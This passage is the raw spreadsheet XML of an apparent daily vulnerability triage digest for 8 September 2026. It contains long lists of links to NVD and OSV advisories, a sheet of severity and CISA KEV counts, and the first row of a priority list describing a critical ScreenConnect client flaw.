Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76962" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76963" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76977" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78455" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78516" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69904" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76960" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76961" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84389" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84392" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82060" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58234" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86517" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62815" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-25249" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19490" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20079" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76461" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85706" TargetMode="External" Id="rId506" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet9.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60004" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76969" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86996" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12259" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15603" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50646" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62383" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62384" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62385" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62815" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62900" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63312" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65915" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69222" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70626" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71493" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71494" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72789" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72790" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72925" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73087" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73262" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73294" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73558" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73560" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75595" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75596" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75604" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77037" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77063" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77078" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78675" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78676" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78677" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78678" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78679" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78681" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78682" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78683" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79657" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79674" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79676" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80205" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80206" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81725" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82333" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83605" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83606" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83607" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83608" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83609" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83611" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83612" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83613" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83614" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83615" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83616" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83617" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83618" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83619" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84303" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84363" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84364" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84365" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84367" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84368" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84369" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84370" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84373" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84375" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84376" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84378" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84379" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84380" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84381" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84382" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84445" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84452" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85061" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85062" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85063" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92595" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92596" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92597" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92598" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-26w7-cxv4-gfx2" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2q42-4q24-7rgv" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2xp9-vwfh-vxw4" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16045" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16042" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-4qhr-qf46-fcrx" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-57v5-wqx3-cgj4" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16047" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16046" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16043" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-j95f-988m-3j2f" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-mqvm-gmc4-6rv2" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-q72m-f2r4-w4cw" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-rgj7-g3m4-5g8c" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-v3f6-m9j2-437p" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16048" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16049" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16050" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16051" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16052" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16056" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16057" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16058" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16199" TargetMode="External" Id="rId109"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2026-09-08</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="2" t="inlineStr">
        <is>
          <t>Window (UTC)</t>
        </is>
      </c>
      <c r="B3" s="3" t="inlineStr">
        <is>
          <t>2026-09-08T00:00 to 2026-09-09T00:00</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2" t="inlineStr">
        <is>
          <t>Generated</t>
        </is>
      </c>
      <c r="B4" s="3" t="inlineStr">
        <is>
          <t>2026-09-18 11:14:44 UTC</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="2" t="inlineStr"/>
      <c r="B5" s="3" t="inlineStr"/>
    </row>
    <row r="6">
      <c r="A6" s="2" t="inlineStr">
        <is>
          <t>Total entries</t>
        </is>
      </c>
      <c r="B6" s="3" t="n">
        <v>1693</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  New - published today</t>
        </is>
      </c>
      <c r="B7" s="3" t="n">
        <v>1678</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Significant updates</t>
        </is>
      </c>
      <c r="B8" s="3" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Added to CISA KEV</t>
        </is>
      </c>
      <c r="B9" s="3" t="n">
        <v>15</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="2" t="inlineStr">
        <is>
          <t>In CISA KEV</t>
        </is>
      </c>
      <c r="B10" s="3" t="n">
        <v>18</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="2" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="B11" s="3" t="n">
        <v>106</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="2" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="B12" s="3" t="n">
        <v>975</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="2" t="inlineStr">
        <is>
          <t>Medium</t>
        </is>
      </c>
      <c r="B13" s="3" t="n">
        <v>496</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="2" t="inlineStr">
        <is>
          <t>Low</t>
        </is>
      </c>
      <c r="B14" s="3" t="n">
        <v>43</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="2" t="inlineStr">
        <is>
          <t>Unscored</t>
        </is>
      </c>
      <c r="B15" s="3" t="n">
        <v>131</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="2" t="inlineStr">
        <is>
          <t>Watchlist matches</t>
        </is>
      </c>
      <c r="B16" s="3" t="n">
        <v>506</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="2" t="inlineStr">
        <is>
          <t>From GitHub Advisories</t>
        </is>
      </c>
      <c r="B17" s="3" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="2" t="inlineStr">
        <is>
          <t>From OSV.dev</t>
        </is>
      </c>
      <c r="B18" s="3" t="n">
        <v>109</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worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetPr><outlinePr summaryBelow="1" summaryRight="1" /><pageSetUpPr /></sheetPr><dimension ref="A1:T1694" /><sheetViews><sheetView workbookViewId="0"><pane xSplit="3" ySplit="1" topLeftCell="D2" activePane="bottomRight" state="frozen" /><selection pane="topRight" /><selection pane="bottomLeft" /><selection pane="bottomRight" activeCell="A1" sqref="A1" /></sheetView></sheetViews><sheetFormatPr baseColWidth="8" defaultRowHeight="15" /><cols><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sheetData><row r="1"><c r="A1" s="4" t="inlineStr"><is><t>Priority</t></is></c><c r="B1" s="4" t="inlineStr"><is><t>Reason</t></is></c><c r="C1" s="4" t="inlineStr"><is><t>ID</t></is></c><c r="D1" s="4" t="inlineStr"><is><t>CVSS</t></is></c><c r="E1" s="4" t="inlineStr"><is><t>Severity</t></is></c><c r="F1" s="4" t="inlineStr"><is><t>Score src</t></is></c><c r="G1" s="4" t="inlineStr"><is><t>KEV</t></is></c><c r="H1" s="4" t="inlineStr"><is><t>EPSS</t></is></c><c r="I1" s="4" t="inlineStr"><is><t>SSVC</t></is></c><c r="J1" s="4" t="inlineStr"><is><t>Watchlist</t></is></c><c r="K1" s="4" t="inlineStr"><is><t>Vendor / Product</t></is></c><c r="L1" s="4" t="inlineStr"><is><t>Package</t></is></c><c r="M1" s="4" t="inlineStr"><is><t>Fixed in</t></is></c><c r="N1" s="4" t="inlineStr"><is><t>Sources</t></is></c><c r="O1" s="4" t="inlineStr"><is><t>Published</t></is></c><c r="P1" s="4" t="inlineStr"><is><t>Last Modified</t></is></c><c r="Q1" s="4" t="inlineStr"><is><t>KEV Due</t></is></c><c r="R1" s="4" t="inlineStr"><is><t>CWE</t></is></c><c r="S1" s="4" t="inlineStr"><is><t>Description</t></is></c><c r="T1" s="4" t="inlineStr"><is><t>Link</t></is></c></row><row r="2"><c r="A2" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B2" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2" s="5" t="inlineStr"><is><t>CVE-2026-84869</t></is></c><c r="D2" s="5" t="n"><v>9.9</v></c><c r="E2" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F2" s="5" t="inlineStr"><is><t>7d616e1a-3288-43b1-a0dd-0a65d3e70a49</t></is></c><c r="G2" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H2" s="5" t="n"><v>0.007</v></c><c r="I2" s="5" t="inlineStr" /><c r="J2" s="5" t="inlineStr" /><c r="K2" s="5" t="inlineStr"><is><t>connectwise:screenconnect</t></is></c><c r="L2" s="5" t="inlineStr" /><c r="M2" s="5" t="inlineStr" /><c r="N2" s="5" t="inlineStr"><is><t>KEV, NVD</t></is></c><c r="O2" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q2" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="R2" s="5" t="inlineStr"><is><t>CWE-269, CWE-862</t></is></c><c r="S2" s="5" t="inlineStr"><is><t>A condition in the ScreenConnect client may allow files to be transferred and executed through an active remote session without authorization or Host confirmation in certain circumstances. ScreenConnect servers are not impacted.</t></is></c><c r="T2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84869</t></is></c></row><row r="3"><c r="A3" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B3" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C3" s="5" 